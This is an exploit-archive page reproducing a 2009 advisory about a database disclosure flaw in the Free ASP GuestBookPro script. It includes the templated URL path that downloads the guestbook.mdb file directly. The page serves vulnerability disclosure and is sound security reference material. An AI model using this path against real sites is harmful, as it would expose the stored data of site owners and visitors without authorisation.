header-logo
Suggest Exploit
vendor:
GuestBookPro
by:
ViRuSMaN
N/A
CVSS
N/A
Remote Database Disclosure
N/A
CWE
Product Name: GuestBookPro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Free ASP GuestBookPro Script Remote Database Disclosure Vulnerability

A vulnerability exists in the Free ASP GuestBookPro Script, which can be exploited by malicious people to disclose the database. The vulnerability is caused due to the guestbook.mdb file being accessible directly from the web. This can be exploited to disclose the database.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|


==============================================================================
        [»] ~ Note : Thx 2 Egyptian National Team
==============================================================================
        [»] Free ASP GuestBookPro Script Remote Database Disclosure Vulnerability
==============================================================================

    [»] Script:             [ GuestBookPro ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Codefixer GuestBookPro - Free ASP GuestBook Script ]
    [»] Download:           [ http://www.codefixer.com/app_guestbookpro/default.asp ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

    [»] http://[target].com/[path]/db/guestbook.mdb


Author: ViRuSMaN <-